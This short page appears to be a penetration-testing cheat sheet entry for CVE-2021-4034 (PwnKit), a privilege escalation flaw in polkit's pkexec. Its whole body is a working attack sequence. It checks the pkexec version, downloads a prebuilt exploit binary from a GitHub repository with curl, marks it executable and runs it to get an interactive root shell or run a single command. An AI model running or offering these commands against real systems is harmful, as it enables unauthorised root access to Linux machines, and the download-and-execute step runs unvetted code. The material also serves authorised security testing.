[CVE-2021-4034] - Pwnkit
Brief
Exploit
# Check with :
pkexec --version
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
# execute
./PwnKit # interactive shell
./PwnKit 'id' # single command
Last updated
Was this helpful?